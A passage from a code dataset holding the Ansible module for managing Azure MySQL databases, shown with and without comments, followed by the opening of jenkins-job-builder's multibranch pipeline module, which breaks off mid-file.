] | 1 | 2021-04-02T08:08:39.000Z | 2021-04-02T08:08:39.000Z | myven/lib/python3.8/site-packages/ansible/modules/cloud/azure/azure_rm_mysqldatabase.py | baltham/dne-dna-code | 4a13309a790a670d2f07e635c9264a0c29976c6a | [
"MIT"
] | null | null | null | myven/lib/python3.8/site-packages/ansible/modules/cloud/azure/azure_rm_mysqldatabase.py | baltham/dne-dna-code | 4a13309a790a670d2f07e635c9264a0c29976c6a | [
"MIT"
] | 1 | 2020-05-03T01:13:16.000Z | 2020-05-03T01:13:16.000Z | #!/usr/bin/python
#
# Copyright (c) 2017 Zim Kalinowski, <zikalino@microsoft.com>
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: azure_rm_mysqldatabase
version_added: "2.5"
short_description: Manage MySQL Database instance.
description:
- Create, update and delete instance of MySQL Database.
options:
resource_group:
description:
- The name of the resource group that contains the resource. You can obtain this value from the Azure Resource Manager API or the portal.
required: True
server_name:
description:
- The name of the server.
required: True
name:
description:
- The name of the database.
required: True
charset:
description:
- The charset of the database. Check MySQL documentation for possible values.
- This is only set on creation, use I(force_update) to recreate a database if the
values don't match.
collation:
description:
- The collation of the database. Check MySQL documentation for possible values.
- This is only set on creation, use I(force_update) to recreate a database if the
values don't match.
force_update:
description:
- When set to C(true), will delete and recreate the existing MySQL database if any
of the properties don't match what is set.
- When set to C(false), no change will occur to the database even if any
of the properties do not match.
type: bool
default: 'no'
extends_documentation_fragment:
- azure
author:
- "Zim Kalinowski (@zikalino)"
'''
EXAMPLES = '''
- name: Create (or update) MySQL Database
azure_rm_mysqldatabase:
resource_group: TestGroup
server_name: testserver
name: db1
'''
RETURN = '''
id:
description:
- Resource ID
returned: always
type: str
sample: /subscriptions/ffffffff-ffff-ffff-ffff-ffffffffffff/resourceGroups/TestGroup/providers/Microsoft.DBforMySQL/servers/testserver/databases/db1
name:
description:
- Resource name.
returned: always
type: str
sample: db1
'''
import time
from ansible.module_utils.azure_rm_common import AzureRMModuleBase
try:
from msrestazure.azure_exceptions import CloudError
from msrestazure.azure_operation import AzureOperationPoller
from azure.mgmt.rdbms.mysql import MySQLManagementClient
from msrest.serialization import Model
except ImportError:
# This is handled in azure_rm_common
pass
class Actions:
NoAction, Create, Update, Delete = range(4)
class AzureRMDatabases(AzureRMModuleBase):
"""Configuration class for an Azure RM MySQL Database resource"""
def __init__(self):
self.module_arg_spec = dict(
resource_group=dict(
type='str',
required=True
),
server_name=dict(
type='str',
required=True
),
name=dict(
type='str',
required=True
),
charset=dict(
type='str'
),
collation=dict(
type='str'
),
force_update=dict(
type='bool',
default=False
),
state=dict(
type='str',
default='present',
choices=['present', 'absent']
)
)
self.resource_group = None
self.server_name = None
self.name = None
self.parameters = dict()
self.results = dict(changed=False)
self.mgmt_client = None
self.state = None
self.to_do = Actions.NoAction
super(AzureRMDatabases, self).__init__(derived_arg_spec=self.module_arg_spec,
supports_check_mode=True,
supports_tags=False)
def exec_module(self, **kwargs):
"""Main module execution method"""
for key in list(self.module_arg_spec.keys()):
if hasattr(self, key):
setattr(self, key, kwargs[key])
elif kwargs[key] is not None:
if key == "charset":
self.parameters["charset"] = kwargs[key]
elif key == "collation":
self.parameters["collation"] = kwargs[key]
old_response = None
response = None
self.mgmt_client = self.get_mgmt_svc_client(MySQLManagementClient,
base_url=self._cloud_environment.endpoints.resource_manager)
resource_group = self.get_resource_group(self.resource_group)
old_response = self.get_mysqldatabase()
if not old_response:
self.log("MySQL Database instance doesn't exist")
if self.state == 'absent':
self.log("Old instance didn't exist")
else:
self.to_do = Actions.Create
else:
self.log("MySQL Database instance already exists")
if self.state == 'absent':
self.to_do = Actions.Delete
elif self.state == 'present':
self.log("Need to check if MySQL Database instance has to be deleted or may be updated")
if ('collation' in self.parameters) and (self.parameters['collation'] != old_response['collation']):
self.to_do = Actions.Update
if ('charset' in self.parameters) and (self.parameters['charset'] != old_response['charset']):
self.to_do = Actions.Update
if self.to_do == Actions.Update:
if self.force_update:
if not self.check_mode:
self.delete_mysqldatabase()
else:
self.to_do = Actions.NoAction
if (self.to_do == Actions.Create) or (self.to_do == Actions.Update):
self.log("Need to Create / Update the MySQL Database instance")
if self.check_mode:
self.results['changed'] = True
return self.results
response = self.create_update_mysqldatabase()
self.results['changed'] = True
self.log("Creation / Update done")
elif self.to_do == Actions.Delete:
self.log("MySQL Database instance deleted")
self.results['changed'] = True
if self.check_mode:
return self.results
self.delete_mysqldatabase()
# make sure instance is actually deleted, for some Azure resources, instance is hanging around
# for some time after deletion -- this should be really fixed in Azure
while self.get_mysqldatabase():
time.sleep(20)
else:
self.log("MySQL Database instance unchanged")
self.results['changed'] = False
response = old_response
if response:
self.results["id"] = response["id"]
self.results["name"] = response["name"]
return self.results
def create_update_mysqldatabase(self):
'''
Creates or updates MySQL Database with the specified configuration.
:return: deserialized MySQL Database instance state dictionary
'''
self.log("Creating / Updating the MySQL Database instance {0}".format(self.name))
try:
response = self.mgmt_client.databases.create_or_update(resource_group_name=self.resource_group,
server_name=self.server_name,
database_name=self.name,
parameters=self.parameters)
if isinstance(response, AzureOperationPoller):
response = self.get_poller_result(response)
except CloudError as exc:
self.log('Error attempting to create the MySQL Database instance.')
self.fail("Error creating the MySQL Database instance: {0}".format(str(exc)))
return response.as_dict()
def delete_mysqldatabase(self):
'''
Deletes specified MySQL Database instance in the specified subscription and resource group.
:return: True
'''
self.log("Deleting the MySQL Database instance {0}".format(self.name))
try:
response = self.mgmt_client.databases.delete(resource_group_name=self.resource_group,
server_name=self.server_name,
database_name=self.name)
except CloudError as e:
self.log('Error attempting to delete the MySQL Database instance.')
self.fail("Error deleting the MySQL Database instance: {0}".format(str(e)))
return True
def get_mysqldatabase(self):
'''
Gets the properties of the specified MySQL Database.
:return: deserialized MySQL Database instance state dictionary
'''
self.log("Checking if the MySQL Database instance {0} is present".format(self.name))
found = False
try:
response = self.mgmt_client.databases.get(resource_group_name=self.resource_group,
server_name=self.server_name,
database_name=self.name)
found = True
self.log("Response : {0}".format(response))
self.log("MySQL Database instance : {0} found".format(response.name))
except CloudError as e:
self.log('Did not find the MySQL Database instance.')
if found is True:
return response.as_dict()
return False
def main():
"""Main execution"""
AzureRMDatabases()
if __name__ == '__main__':
main()
| 34.824916 | 152 | 0.577202 |
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: azure_rm_mysqldatabase
version_added: "2.5"
short_description: Manage MySQL Database instance.
description:
- Create, update and delete instance of MySQL Database.
options:
resource_group:
description:
- The name of the resource group that contains the resource. You can obtain this value from the Azure Resource Manager API or the portal.
required: True
server_name:
description:
- The name of the server.
required: True
name:
description:
- The name of the database.
required: True
charset:
description:
- The charset of the database. Check MySQL documentation for possible values.
- This is only set on creation, use I(force_update) to recreate a database if the
values don't match.
collation:
description:
- The collation of the database. Check MySQL documentation for possible values.
- This is only set on creation, use I(force_update) to recreate a database if the
values don't match.
force_update:
description:
- When set to C(true), will delete and recreate the existing MySQL database if any
of the properties don't match what is set.
- When set to C(false), no change will occur to the database even if any
of the properties do not match.
type: bool
default: 'no'
extends_documentation_fragment:
- azure
author:
- "Zim Kalinowski (@zikalino)"
'''
EXAMPLES = '''
- name: Create (or update) MySQL Database
azure_rm_mysqldatabase:
resource_group: TestGroup
server_name: testserver
name: db1
'''
RETURN = '''
id:
description:
- Resource ID
returned: always
type: str
sample: /subscriptions/ffffffff-ffff-ffff-ffff-ffffffffffff/resourceGroups/TestGroup/providers/Microsoft.DBforMySQL/servers/testserver/databases/db1
name:
description:
- Resource name.
returned: always
type: str
sample: db1
'''
import time
from ansible.module_utils.azure_rm_common import AzureRMModuleBase
try:
from msrestazure.azure_exceptions import CloudError
from msrestazure.azure_operation import AzureOperationPoller
from azure.mgmt.rdbms.mysql import MySQLManagementClient
from msrest.serialization import Model
except ImportError:
# This is handled in azure_rm_common
pass
class Actions:
NoAction, Create, Update, Delete = range(4)
class AzureRMDatabases(AzureRMModuleBase):
def __init__(self):
self.module_arg_spec = dict(
resource_group=dict(
type='str',
required=True
),
server_name=dict(
type='str',
required=True
),
name=dict(
type='str',
required=True
),
charset=dict(
type='str'
),
collation=dict(
type='str'
),
force_update=dict(
type='bool',
default=False
),
state=dict(
type='str',
default='present',
choices=['present', 'absent']
)
)
self.resource_group = None
self.server_name = None
self.name = None
self.parameters = dict()
self.results = dict(changed=False)
self.mgmt_client = None
self.state = None
self.to_do = Actions.NoAction
super(AzureRMDatabases, self).__init__(derived_arg_spec=self.module_arg_spec,
supports_check_mode=True,
supports_tags=False)
def exec_module(self, **kwargs):
for key in list(self.module_arg_spec.keys()):
if hasattr(self, key):
setattr(self, key, kwargs[key])
elif kwargs[key] is not None:
if key == "charset":
self.parameters["charset"] = kwargs[key]
elif key == "collation":
self.parameters["collation"] = kwargs[key]
old_response = None
response = None
self.mgmt_client = self.get_mgmt_svc_client(MySQLManagementClient,
base_url=self._cloud_environment.endpoints.resource_manager)
resource_group = self.get_resource_group(self.resource_group)
old_response = self.get_mysqldatabase()
if not old_response:
self.log("MySQL Database instance doesn't exist")
if self.state == 'absent':
self.log("Old instance didn't exist")
else:
self.to_do = Actions.Create
else:
self.log("MySQL Database instance already exists")
if self.state == 'absent':
self.to_do = Actions.Delete
elif self.state == 'present':
self.log("Need to check if MySQL Database instance has to be deleted or may be updated")
if ('collation' in self.parameters) and (self.parameters['collation'] != old_response['collation']):
self.to_do = Actions.Update
if ('charset' in self.parameters) and (self.parameters['charset'] != old_response['charset']):
self.to_do = Actions.Update
if self.to_do == Actions.Update:
if self.force_update:
if not self.check_mode:
self.delete_mysqldatabase()
else:
self.to_do = Actions.NoAction
if (self.to_do == Actions.Create) or (self.to_do == Actions.Update):
self.log("Need to Create / Update the MySQL Database instance")
if self.check_mode:
self.results['changed'] = True
return self.results
response = self.create_update_mysqldatabase()
self.results['changed'] = True
self.log("Creation / Update done")
elif self.to_do == Actions.Delete:
self.log("MySQL Database instance deleted")
self.results['changed'] = True
if self.check_mode:
return self.results
self.delete_mysqldatabase()
# make sure instance is actually deleted, for some Azure resources, instance is hanging around
# for some time after deletion -- this should be really fixed in Azure
while self.get_mysqldatabase():
time.sleep(20)
else:
self.log("MySQL Database instance unchanged")
self.results['changed'] = False
response = old_response
if response:
self.results["id"] = response["id"]
self.results["name"] = response["name"]
return self.results
def create_update_mysqldatabase(self):
self.log("Creating / Updating the MySQL Database instance {0}".format(self.name))
try:
response = self.mgmt_client.databases.create_or_update(resource_group_name=self.resource_group,
server_name=self.server_name,
database_name=self.name,
parameters=self.parameters)
if isinstance(response, AzureOperationPoller):
response = self.get_poller_result(response)
except CloudError as exc:
self.log('Error attempting to create the MySQL Database instance.')
self.fail("Error creating the MySQL Database instance: {0}".format(str(exc)))
return response.as_dict()
def delete_mysqldatabase(self):
self.log("Deleting the MySQL Database instance {0}".format(self.name))
try:
response = self.mgmt_client.databases.delete(resource_group_name=self.resource_group,
server_name=self.server_name,
database_name=self.name)
except CloudError as e:
self.log('Error attempting to delete the MySQL Database instance.')
self.fail("Error deleting the MySQL Database instance: {0}".format(str(e)))
return True
def get_mysqldatabase(self):
self.log("Checking if the MySQL Database instance {0} is present".format(self.name))
found = False
try:
response = self.mgmt_client.databases.get(resource_group_name=self.resource_group,
server_name=self.server_name,
database_name=self.name)
found = True
self.log("Response : {0}".format(response))
self.log("MySQL Database instance : {0} found".format(response.name))
except CloudError as e:
self.log('Did not find the MySQL Database instance.')
if found is True:
return response.as_dict()
return False
def main():
AzureRMDatabases()
if __name__ == '__main__':
main()
| true | true |
1c331b0913f847b13de2e972bc7a00bde2fbf4db | 47,483 | py | Python | jenkins_jobs/modules/project_multibranch.py | knorx/jenkins-job-builder | d15e57a14a7aa6a9de674479e1dcb904a8c09942 | [
"Apache-2.0"
] | 3 | 2019-03-03T20:15:29.000Z | 2020-11-17T18:48:27.000Z | jenkins_jobs/modules/project_multibranch.py | knorx/jenkins-job-builder | d15e57a14a7aa6a9de674479e1dcb904a8c09942 | [
"Apache-2.0"
] | null | null | null | jenkins_jobs/modules/project_multibranch.py | knorx/jenkins-job-builder | d15e57a14a7aa6a9de674479e1dcb904a8c09942 | [
"Apache-2.0"
] | 1 | 2019-02-21T22:59:17.000Z | 2019-02-21T22:59:17.000Z | # -*- coding: utf-8 -*-
# Copyright (C) 2015 Joost van der Griendt <joostvdg@gmail.com>
# Copyright (C) 2018 Sorin Sbarnea <ssbarnea@users.noreply.github.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
The Multibranch Pipeline project module handles creating Jenkins workflow
projects.
You may specify ``multibranch`` in the ``project-type`` attribute of
the :ref:`Job` definition.
Multibranch Pipeline implementantion in JJB is marked as **experimental**
which means that there is no guarantee that its behavior (or configuration)
will not change, even between minor releases.
Plugins required:
* :jenkins-wiki:`Workflow Plugin <Workflow+Plugin>`.
* :jenkins-wiki:`Pipeline Multibranch Defaults Plugin
<Pipeline+Multibranch+Defaults+Plugin>` (optional)
* :jenkins-wiki:`Basic Branch Build Strategies Plugin
<Basic+Branch+Build+Strategies+Plugin>` (optional)
:Job Parameters:
* **scm** (`list`): The SCM definition.
* **bitbucket** (`dict`): Refer to
:func:`~bitbucket_scm <bitbucket_scm>` for documentation.
* **gerrit** (`dict`): Refer to
:func:`~gerrit_scm <gerrit_scm>` for documentation.
* **git** (`dict`): Refer to
:func:`~git_scm <git_scm>` for documentation.
* **github** (`dict`): Refer to
:func:`~github_scm <github_scm>` for documentation.
* **periodic-folder-trigger** (`str`): How often to scan for new branches
or pull/change requests. Valid values: 1m, 2m, 5m, 10m, 15m, 20m, 25m,
30m, 1h, 2h, 4h, 8h, 12h, 1d, 2d, 1w, 2w, 4w. (default none)
* **prune-dead-branches** (`bool`): If dead branches upon check should
result in their job being dropped. (default true)
* **number-to-keep** (`int`): How many builds should be kept.
(default '-1, all')
* **days-to-keep** (`int`): For how many days should a build be kept.
(default '-1, forever')
* **script-path** (`str`): Path to Jenkinsfile, relative to workspace.
(default 'Jenkinsfile')
Job examples:
.. literalinclude:: /../../tests/multibranch/fixtures/multibranch_defaults.yaml
.. literalinclude:: /../../tests/multibranch/fixtures/multi_scm_full.yaml
"""
import collections
import logging
import xml.etree.ElementTree as XML
import jenkins_jobs.modules.base
import jenkins_jobs.modules.helpers as helpers
import six
from jenkins_jobs.modules.scm import git_extensions
from jenkins_jobs.errors import InvalidAttributeError
logger = logging.getLogger(str(__name__))
class WorkflowMultiBranch(jenkins_jobs.modules.base.Base):
sequence = 0
multibranch_path = 'org.jenkinsci.plugins.workflow.multibranch'
jenkins_class = ''.join([multibranch_path, '.WorkflowMultiBranchProject'])
jenkins_factory_class = ''.join(
[multibranch_path, '.WorkflowBranchProjectFactory'])
def root_xml(self, data):
xml_parent = XML.Element(self.jenkins_class)
xml_parent.attrib['plugin'] = 'workflow-multibranch'
XML.SubElement(xml_parent, 'properties')
#########
# Views #
#########
views = XML.SubElement(xml_parent, 'views')
all_view = XML.SubElement(views, 'hudson.model.AllView')
all_view_mapping = [
('', 'name', 'All'),
('', 'filterExecutors', False),
('', 'filterQueue', False),
]
helpers.convert_mapping_to_xml(
all_view, {}, all_view_mapping, fail_required=True)
XML.SubElement(all_view, 'properties', {
'class': 'hudson.model.View$PropertyList'
})
XML.SubElement(all_view, 'owner', {
'class': self.jenkins_class,
'reference': '../../..'
})
XML.SubElement(xml_parent, 'viewsTabBar', {
'class': 'hudson.views.DefaultViewsTabBar'
})
################
# Folder Views #
################
folderViews = XML.SubElement(xml_parent, 'folderViews', {
'class': 'jenkins.branch.MultiBranchProjectViewHolder',
'plugin': 'branch-api',
})
XML.SubElement(folderViews, 'owner', {
'class': self.jenkins_class,
'reference': '../..'
})
##################
# Health Metrics #
##################
hm = XML.SubElement(xml_parent, 'healthMetrics')
hm_path = ('com.cloudbees.hudson.plugins.folder.health'
'.WorstChildHealthMetric')
hm_plugin = XML.SubElement(hm, hm_path, {
'plugin': 'cloudbees-folder',
})
XML.SubElement(hm_plugin, 'nonRecursive').text = 'false'
########
# Icon #
########
icon = XML.SubElement(xml_parent, 'icon', {
'class': 'jenkins.branch.MetadataActionFolderIcon',
'plugin': 'branch-api',
})
XML.SubElement(icon, 'owner', {
'class': self.jenkins_class,
'reference': '../..'
})
########################
# Orphan Item Strategy #
########################
ois_default_strategy = ('com.cloudbees.hudson.plugins.'
'folder.computed.DefaultOrphanedItemStrategy')
ois = XML.SubElement(
xml_parent, 'orphanedItemStrategy', {
'class': ois_default_strategy,
'plugin': 'cloudbees-folder',
}
)
ois_mapping = [
('prune-dead-branches', 'pruneDeadBranches', True, [True, False]),
('days-to-keep', 'daysToKeep', -1),
('number-to-keep', 'numToKeep', -1),
]
helpers.convert_mapping_to_xml(ois, data, ois_mapping)
###########################
# Periodic Folder Trigger #
###########################
triggers = XML.SubElement(xml_parent, 'triggers')
# Valid options for the periodic trigger interval.
pft_map = collections.OrderedDict([
("1m", ("* * * * *", '60000')),
("2m", ("*/2 * * * *", '120000')),
("5m", ("*/5 * * * *", '300000')),
("10m", ("H/6 * * * *", '600000')),
("15m", ("H/6 * * * *", '900000')),
("20m", ("H/3 * * * *", '1200000')),
("25m", ("H/3 * * * *", '1500000')),
("30m", ("H/2 * * * *", '1800000')),
("1h", ("H * * * *", '3600000')),
("2h", ("H * * * *", '7200000')),
("4h", ("H * * * *", '14400000')),
("8h", ("H * * * *", '28800000')),
("12h", ("H H * * *", '43200000')),
("1d", ("H H * * *", '86400000')),
("2d", ("H H * * *", '172800000')),
("1w", ("H H * * *", '604800000')),
("2w", ("H H * * *", '1209600000')),
("4w", ("H H * * *", '2419200000')),
])
pft_val = data.get('periodic-folder-trigger')
if pft_val:
if not pft_map.get(pft_val):
raise InvalidAttributeError(
'periodic-folder-trigger',
pft_val,
pft_map.keys())
pft_path = (
'com.cloudbees.hudson.plugins.folder.computed.'
'PeriodicFolderTrigger')
pft = XML.SubElement(triggers, pft_path, {
'plugin': 'cloudbees-folder'
})
XML.SubElement(pft, 'spec').text = pft_map[pft_val][0]
XML.SubElement(pft, 'interval').text = pft_map[pft_val][1]
###########
# Sources #
###########
sources = XML.SubElement(xml_parent, 'sources', {
'class': 'jenkins.branch.MultiBranchProject$BranchSourceList',
'plugin': 'branch-api',
})
sources_data = XML.SubElement(sources, 'data')
XML.SubElement(sources, 'owner', {
'class': self.jenkins_class,
'reference': '../..',
})
valid_scm = [
'bitbucket',
'gerrit',
'git',
'github',
]
for scm_data in data.get('scm', None):
for scm in scm_data:
bs = XML.SubElement(
sources_data, 'jenkins.branch.BranchSource')
if scm == 'bitbucket':
bitbucket_scm(bs, scm_data[scm])
elif scm == 'gerrit':
gerrit_scm(bs, scm_data[scm])
elif scm == 'git':
git_scm(bs, scm_data[scm])
elif scm == 'github':
github_scm(bs, scm_data[scm])
else:
raise InvalidAttributeError('scm', scm_data, valid_scm)
###########
# Factory #
###########
factory = XML.SubElement(xml_parent, 'factory', {
'class': self.jenkins_factory_class,
})
XML.SubElement(factory, 'owner', {
'class': self.jenkins_class,
'reference': '../..'
})
XML.SubElement(factory, 'scriptPath').text = data.get(
'script-path', 'Jenkinsfile')
return xml_parent
class WorkflowMultiBranchDefaults(WorkflowMultiBranch):
jenkins_class = (
'org.jenkinsci.plugins.pipeline.multibranch'
'.defaults.PipelineMultiBranchDefaultsProject')
jenkins_factory_class = (
'org.jenkinsci.plugins.pipeline.multibranch'
'.defaults.PipelineBranchDefaultsProjectFactory')
def bitbucket_scm(xml_parent, data):
r"""Configure BitBucket scm
Requires the :jenkins-wiki:`Bitbucket Branch Source Plugin
<Bitbucket+Branch+Source+Plugin>`.
:arg str credentials-id: The credential to use to scan BitBucket.
(required)
:arg str repo-owner: Specify the name of the Bitbucket Team or Bitbucket
User Account. (required)
:arg str repo: The BitBucket repo. (required)
:arg bool discover-tags: Discovers tags on the repository.
(default false)
:arg str server-url: The address of the bitbucket server. (optional)
:arg str head-filter-regex: A regular expression for filtering
discovered source branches. Requires the :jenkins-wiki:`SCM API Plugin
<SCM+API+Plugin>`.
:arg str discovery-branch: Discovers branches on the repository.
Valid options: ex-pr, only-pr, all.
Value is not specified by default.
:arg str discover-pr-origin: Discovers pull requests where the origin
repository is the same as the target repository.
Valid options: mergeOnly, headOnly, mergeAndHead.
Value is not specified by default.
:arg str discover-pr-forks-strategy: Fork strategy. Valid options:
merge-current, current, both, false. (default 'merge-current')
:arg str discover-pr-forks-trust: Discovers pull requests where the origin
repository is a fork of the target repository.
Valid options: contributors, everyone, permission or nobody.
(default 'contributors')
:arg list build-strategies: Provides control over whether to build a branch
(or branch like things such as change requests and tags) whenever it is
discovered initially or a change from the previous revision has been
detected. (optional)
Refer to :func:`~build_strategies <build_strategies>`.
:arg dict property-strategies: Provides control over how to build a branch
(like to disable SCM triggering or to override the pipeline durability)
(optional)
Refer to :func:`~property_strategies <property_strategies>`.
:arg bool local-branch: Check out to matching local branch
If given, checkout the revision to build as HEAD on this branch.
If selected, then the branch name is computed from the remote branch
without the origin. In that case, a remote branch origin/master will
be checked out to a local branch named master, and a remote branch
origin/develop/new-feature will be checked out to a local branch
named develop/newfeature.
Requires the :jenkins-wiki:`Git Plugin <Git+Plugin>`.
:arg dict checkout-over-ssh: Checkout repo over ssh.
* **credentials** ('str'): Credentials to use for
checkout of the repo over ssh.
:arg dict filter-by-name-wildcard: Enable filter by name with wildcards.
Requires the :jenkins-wiki:`SCM API Plugin <SCM+API+Plugin>`.
* **includes** ('str'): Space-separated list
of name patterns to consider. You may use * as a wildcard;
for example: `master release*`
* **excludes** ('str'): Name patterns to
ignore even if matched by the includes list.
For example: `release*`
:extensions:
* **clean** (`dict`)
* **after** (`bool`) - Clean the workspace after checkout
* **before** (`bool`) - Clean the workspace before checkout
* **prune** (`bool`) - Prune remote branches (default false)
* **shallow-clone** (`bool`) - Perform shallow clone (default false)
* **depth** (`int`) - Set shallow clone depth (default 1)
* **do-not-fetch-tags** (`bool`) - Perform a clone without tags
(default false)
* **submodule** (`dict`)
* **disable** (`bool`) - By disabling support for submodules you
can still keep using basic git plugin functionality and just have
Jenkins to ignore submodules completely as if they didn't exist.
* **recursive** (`bool`) - Retrieve all submodules recursively
(uses '--recursive' option which requires git>=1.6.5)
* **tracking** (`bool`) - Retrieve the tip of the configured
branch in .gitmodules (Uses '\-\-remote' option which requires
git>=1.8.2)
* **parent-credentials** (`bool`) - Use credentials from default
remote of parent repository (default false).
* **reference-repo** (`str`) - Path of the reference repo to use
during clone (optional)
* **timeout** (`int`) - Specify a timeout (in minutes) for
submodules operations (default 10).
* **timeout** (`str`) - Timeout for git commands in minutes (optional)
* **use-author** (`bool`): Use author rather than committer in Jenkin's
build changeset (default false)
* **wipe-workspace** (`bool`) - Wipe out workspace before build
(default true)
Minimal Example:
.. literalinclude::
/../../tests/multibranch/fixtures/scm_bitbucket_minimal.yaml
Full Example:
.. literalinclude::
/../../tests/multibranch/fixtures/scm_bitbucket_full.yaml
"""
source = XML.SubElement(xml_parent, 'source', {
'class': 'com.cloudbees.jenkins.plugins.bitbucket.BitbucketSCMSource',
'plugin': 'cloudbees-bitbucket-branch-source',
})
source_mapping = [
('', 'id', '-'.join(['bb', data.get('repo-owner', ''),
data.get('repo', '')])),
('repo-owner', 'repoOwner', None),
('repo', 'repository', None),
]
helpers.convert_mapping_to_xml(
source, data, source_mapping, fail_required=True)
mapping_optional = [
('credentials-id', 'credentialsId', None),
('server-url', 'serverUrl', None),
]
helpers.convert_mapping_to_xml(
source, data, mapping_optional, fail_required=False)
traits = XML.SubElement(source, 'traits')
if data.get('discover-tags', False):
XML.SubElement(traits,
'com.cloudbees.jenkins.plugins.bitbucket.TagDiscoveryTrait')
if data.get('head-filter-regex', None):
rshf = XML.SubElement(traits,
'jenkins.scm.impl.trait.RegexSCMHeadFilterTrait')
XML.SubElement(rshf, 'regex').text = data.get('head-filter-regex')
if data.get('discover-pr-origin', None):
dpro = XML.SubElement(traits,
'com.cloudbees.jenkins.plugins.bitbucket'
'.OriginPullRequestDiscoveryTrait')
dpro_strategies = {
'mergeOnly': '1',
'headOnly': '2',
'mergeAndHead': '3'
}
dpro_mapping = [
('discover-pr-origin', 'strategyId', None, dpro_strategies)
]
helpers.convert_mapping_to_xml(
dpro, data, dpro_mapping, fail_required=True)
if data.get('discover-pr-forks-strategy'):
dprf = XML.SubElement(traits,
'com.cloudbees.jenkins.plugins.bitbucket'
'.ForkPullRequestDiscoveryTrait')
dprf_strategy = {
'merge-current': '1',
'current': '2',
'both': '3',
}
dprf_mapping = [
('discover-pr-forks-strategy', 'strategyId', 'merge-current',
dprf_strategy)
]
helpers.convert_mapping_to_xml(
dprf, data, dprf_mapping, fail_required=True)
trust = data.get('discover-pr-forks-trust', 'contributors')
trust_map = {
'contributors': ''.join([
'com.cloudbees.jenkins.plugins.bitbucket'
'.ForkPullRequestDiscoveryTrait$TrustContributors']),
'everyone': ''.join([
'com.cloudbees.jenkins.plugins.bitbucket'
'.ForkPullRequestDiscoveryTrait$TrustEveryone']),
'permission': ''.join([
'com.cloudbees.jenkins.plugins.bitbucket'
'.ForkPullRequestDiscoveryTrait$TrustPermission']),
'nobody': ''.join([
'com.cloudbees.jenkins.plugins.bitbucket'
'.ForkPullRequestDiscoveryTrait$TrustNobody']),
}
if trust not in trust_map:
raise InvalidAttributeError('discover-pr-forks-trust',
trust,
trust_map.keys())
XML.SubElement(dprf, 'trust').attrib['class'] = trust_map[trust]
if data.get('discover-branch', None):
dbr = XML.SubElement(traits,
'com.cloudbees.jenkins.plugins.bitbucket.BranchDiscoveryTrait')
dbr_strategies = {
'ex-pr': '1',
'only-pr': '2',
'all': '3'
}
dbr_mapping = [
('discover-branch', 'strategyId', None, dbr_strategies)
]
helpers.convert_mapping_to_xml(
dbr, data, dbr_mapping, fail_required=True)
if data.get('property-strategies', None):
property_strategies(xml_parent, data)
if data.get('build-strategies', None):
build_strategies(xml_parent, data)
if data.get('local-branch', False):
lbr = XML.SubElement(traits,
'jenkins.plugins.git.traits.LocalBranchTrait', {
'plugin': 'git',
}
)
lbr_extension = XML.SubElement(lbr,
'extension', {
'class': 'hudson.plugins.git.extensions.impl.LocalBranch',
}
)
XML.SubElement(lbr_extension,
'localBranch').text = "**"
if data.get('checkout-over-ssh', None):
cossh = XML.SubElement(traits,
'com.cloudbees.jenkins.plugins.bitbucket.SSHCheckoutTrait')
cossh_credentials = [
('credentials', 'credentialsId', ''),
]
helpers.convert_mapping_to_xml(
cossh,
data.get('checkout-over-ssh'),
cossh_credentials,
fail_required=True)
if data.get('filter-by-name-wildcard', None):
wscmf_name = XML.SubElement(traits,
'jenkins.scm.impl.trait.WildcardSCMHeadFilterTrait', {
'plugin': 'scm-api',
}
)
wscmf_name_mapping = [
('includes', 'includes', ''),
('excludes', 'excludes', '')
]
helpers.convert_mapping_to_xml(
wscmf_name,
data.get('filter-by-name-wildcard', ''),
wscmf_name_mapping,
fail_required=True)
# handle the default git extensions like:
# - clean
# - shallow-clone
# - timeout
# - do-not-fetch-tags
# - submodule
# - prune
# - wipe-workspace
# - use-author
git_extensions(traits, data)
def gerrit_scm(xml_parent, data):
"""Configure Gerrit SCM
Requires the :jenkins-wiki:`Gerrit Code Review Plugin
<Gerrit+Code+Review+Plugin>`.
:arg str url: The git url. (required)
:arg str credentials-id: The credential to use to connect to the GIT URL.
:arg bool ignore-on-push-notifications: If a job should not trigger upon
push notifications. (default false)
:arg list(str) refspecs: Which refspecs to look for.
(default ``['+refs/changes/*:refs/remotes/@{remote}/*',
'+refs/heads/*:refs/remotes/@{remote}/*']``)
:arg str includes: Comma-separated list of branches to be included.
(default '*')
:arg str excludes: Comma-separated list of branches to be excluded.
(default '')
:arg list build-strategies: Provides control over whether to build a branch
(or branch like things such as change requests and tags) whenever it is
discovered initially or a change from the previous revision has been
detected. (optional)
Refer to :func:`~build_strategies <build_strategies>`.
:arg dict property-strategies: Provides control over how to build a branch
(like to disable SCM triggering or to override the pipeline durability)
(optional)
Refer to :func:`~property_strategies <property_strategies>`.
Minimal Example:
.. literalinclude::
/../../tests/multibranch/fixtures/scm_gerrit_minimal.yaml
Full Example:
.. literalinclude::
/../../tests/multibranch/fixtures/scm_gerrit_full.yaml
"""
source = XML.SubElement(xml_parent, 'source', {
'class': 'jenkins.plugins.gerrit.GerritSCMSource',
'plugin': 'gerrit',
})
source_mapping = [
('', 'id', '-'.join(['gr', data.get('url', '')])),
('url', 'remote', None),
('credentials-id', 'credentialsId', ''),
('includes', 'includes', '*'),
('excludes', 'excludes', ''),
('ignore-on-push-notifications', 'ignoreOnPushNotifications', True),
]
helpers.convert_mapping_to_xml(
source, data, source_mapping, fail_required=True)
source_mapping_optional = [
('api-uri', 'apiUri', None),
]
helpers.convert_mapping_to_xml(
source, data, source_mapping_optional, fail_required=False)
# Traits
traits = XML.SubElement(source, 'traits')
XML.SubElement(traits,
'jenkins.plugins.gerrit.traits.ChangeDiscoveryTrait')
# Refspec Trait
refspec_trait = XML.SubElement(
traits, 'jenkins.plugins.git.traits.RefSpecsSCMSourceTrait', {
